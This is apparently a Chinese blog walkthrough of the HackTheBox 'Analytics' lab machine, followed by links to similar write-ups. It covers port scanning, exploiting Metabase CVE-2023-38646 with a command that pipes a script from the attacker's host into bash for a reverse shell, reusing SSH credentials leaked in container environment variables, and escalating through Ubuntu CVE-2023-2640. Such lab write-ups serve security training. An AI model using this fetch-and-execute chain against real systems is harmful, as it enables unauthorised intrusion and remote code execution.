HackTheBox—Analytics靶机

最新推荐文章于 2024-04-19 16:26:53 发布
最新推荐文章于 2024-04-19 16:26:53 发布
阅读量319 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSUwg/article/details/134247460
版权

靶机难度不大 利用的都是较新的CVE漏洞

简介

一台新的Linux机器,在HTB官方难度为easy模式。

信息收集

启动靶机 确定靶机IP 然后测试本地与靶机的连接性。

image-20231011182526515

image-20231011182552362

测试连接成功。

使用nmap对 靶机进行开放端口扫描

nmap -sV 10.10.11.233

image-20231011182805030

开放端口为 22 和 80端口。

访问靶机 80端口。

image-20231011183044431

感觉是一个静态的前端页面,也没有得到建站CMS类型。

除了有一个登录口 进入登录口的界面。

使用路径扫描 看是否可以得到敏感信息。

dirsearch -u http://analytical.htb/

没有得到什么有效的路径信息。

尝试进行下host碰撞 将登录口跳转的data 子域名配合靶机的IP加入host文件中。

image-20231011193815543

成功访问

反弹shell

是Metabase 感觉是一个组件。直接谷歌查找一下有没有相关漏洞

有新鲜的漏洞信息。

国外有位师傅写了利用工具

GitHub - robotmikhro/CVE-2023-38646: Automatic Tools For Metabase Exploit Known As CVE-2023-38646

访问链接将工具下载下来。

首先在目录下一个反弹shell,然后启动服务。

image-20231011200542217

然后使用下载下来的工具

python3 single.py -u http://data.analytical.htb -c 'curl 10.10.14.30/1.sh |bash'

image-20231011200615091

注意1.sh| 之间要加空格 我开始打的时候 忘了加空格 结果半天没有反弹shell。

然后启动监听服务。

成功反弹shell。

image-20231011200739053

image-20231011201601186

发现有docker 的env文件 那么现在多半是在一个docker的容器里面。

输入env查看当前环境

image-20231011202029976

image-20231011202143513

开始还没发现。这个其实就是ssh的账号和密码

META_USER=metalytics   
META_PASS=An4lytics_ds20223#

成功连接ssh。

image-20231011202512841

权限提升

这里没有suid 和sudo -l直接尝试内核提权。

uname -a

image-20231011202627031

感觉是一个比较新的版本了。

使用kali里面的漏洞库进行提权 感觉不太现实。于是直接去谷歌查找最新漏洞。

image-20231011201159654

最后成功找到相关方案

https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升 | CN-SEC 中文网

image-20231011203550364

成功反弹回来root权限。

image-20231011203856454

总结

这台机器难度比较简单 前期通过nday getshell但是那个时候 我们进去的是docker 容器里面 需要查找env配置文件得到ssh连接的账号密码。真正的拿下机器的普通用户权限。然后通过内核提权的方式进行权限提升。

whiteO123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试学习] Analytics - HackTheBox
rev1ve的博客
12-18 634
它旨在为非技术用户提供一种简单的方式来探索和分析数据,无需编写复杂的查询语句或使用复杂的分析工具。Metabase提供了一个直观的用户界面,允许用户通过简单的拖放和点击操作来创建和定制数据仪表板、报表和查询。token是刚刚得到的,然后记得修改Content-Type为json。我用的是curl本地反弹shell的sh文件,在本地开启服务。发现两个端口,22端口为ssh服务,80端口有http服务。直接ssh连接,得到user的flag。看了下其他师傅的wp,用的是内核提权。然后修改为POST请求,访问。
Hack The Box-Analysis
m0_52742680的博客
01-25 1389
HackTheBox季节性靶场第三篇
Hack The Box-Analytics
m0_52742680的博客
12-27 643
发现存在22、80端口。
HackTheBox系列-Analytics
qq_43264813的博客
12-18 875
1、使用nmap进行端口扫描2、发现目标开放了两个端口,对22和80端口进行信息收集3、扫描发现80端口绑定着一个域名analytical.htb,将其添加到hosts文件中并使用浏览器访问4、对网页进行信息收集发现一个子域名data.analytical.htb5、目录枚举半天也没有发现什么,子域名爆破也没有爆破出来其它子域名6、将发现的子域名添加到hosts文件并使用浏览器访问刚才在源码中发现的子域名,发现是一个标题为Metabase的站。
hack the box - Analytics
weixin_73968711的博客
12-17 501
hack the box - Analytics
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
平台的核心功能包括: 虚拟靶场: Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
最新发布
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
平台的核心功能包括:虚拟靶场:Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到
06-22
Hack The Box 提供了一系列的虚拟机(靶机),这些虚拟机模拟了真实世界中可能遇到的各种系统配置和安全漏洞。 参与者需要利用自己的知识和工具来破解这些虚拟机,找到所谓的“flag”(通常是文本文件),并提交到...
Hack the box靶机 Irked
菜浪马废的博客
05-22 249
nmap扫描完我就觉得突破口在irc 但是没有任何信息啊 再找找
Hack the box靶机 Arctic
菜浪马废的博客
06-03 380
找到后台登录地址 coldfusion 8 搜索漏洞 找到可以上传的地方 需要payload 使用MS10-059 https://github.com/Re4son/Chimichurri 完成
hack the box:postman靶机
zr1213159840的博客
05-08 1585
还是正常打开靶机,然后使用nmap扫描。看看有什么端口是打开的。扫描结果显示,开启了22,80,6379,10000端口。其中6379端口和10000端口值得注意。 nmap -sV -Pn 10.10.10.160 (这有个非常奇怪的地方,我第一次做的时候namp以及masscan无论如何都扫描不出6379端口,但是直接访问又是可以,感觉很郁闷,直接在第一步卡住了。菜……) 我们分别打开80,10000端口看看。其中80端口就是一个简单的页面。 10000端口打开,是webmin,注意这个地方要采用
靶机渗透_hackthebox__haystack -4
qq_34717555的博客
11-11 1317
获得靶机IP 10.10.10.115 nmap 扫一下 nmap -A IP 得到三个开放端口 Nmap scan report for bogon (10.10.10.115) Host is up (0.28s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open s...
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 1685
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 2037
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
记第一次打hack the box靶场之Meow靶机
shurongyugong的博客
04-19 156
hack the box靶场之Meow靶机
Hack the box -- 靶机渗透测试(TIER0)
wjishuxiaobai的博客
06-21 760
本文针对Hack the box 靶机渗透过程进行记录。开启在线靶机靶机IP为10.129.10.113。 首先使用Nmap进行端口扫描,扫描命令为nmap -v -sV -sC 10.129.50.113。 发现其开放了23端口的telnet服务,即可以提供远程登陆。所以我们尝试使用telnet连接目标主机。 不出所料需要密码进行登陆。 猜测密码,尝试登陆 使用常见的密码如admin、administrator、root等,发现输入root成功登陆。 查找Flag 总结 至此,靶机Meow已成功攻破。
Hack the box -- 靶机渗透测试(TIER1)
wjishuxiaobai的博客
06-22 1457
本文针对Hack the box 靶机TIER1渗透过程进行记录。开启在线靶机靶机IP为10.129.208.78。2.SQL注入 浏览器输入靶机IP10.129.208.78,页面如下。发现是个登录界面,首先尝试常见密码登录如root:root admin:admin administrator:password,登录失败。 随即尝试SQL注入,用户名输入admin‘#,密码输入 123(可随意输入)。成功登录。 Flag 成功获取开启在线靶机靶机IP为10.129.246.195。开启在线靶机,靶
hackthebox注册
05-10
如果您想注册HackTheBox,请按照以下步骤操作: 1. 访问HackTheBox网站:https://www.hackthebox.eu/ 2. 单击右上角的“注册”按钮。 3. 输入您的电子邮件地址并创建一个帐户。 4. 您将收到一封电子邮件,其中包含激活您的帐户所需的链接。单击该链接即可激活帐户。 5. 登录HackTheBox并开始挑战! 请注意,HackTheBox是一个仅限邀请的平台,您需要获得邀请代码才能注册。您可以通过在HackTheBox的论坛上积极参与社区来获得邀请码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值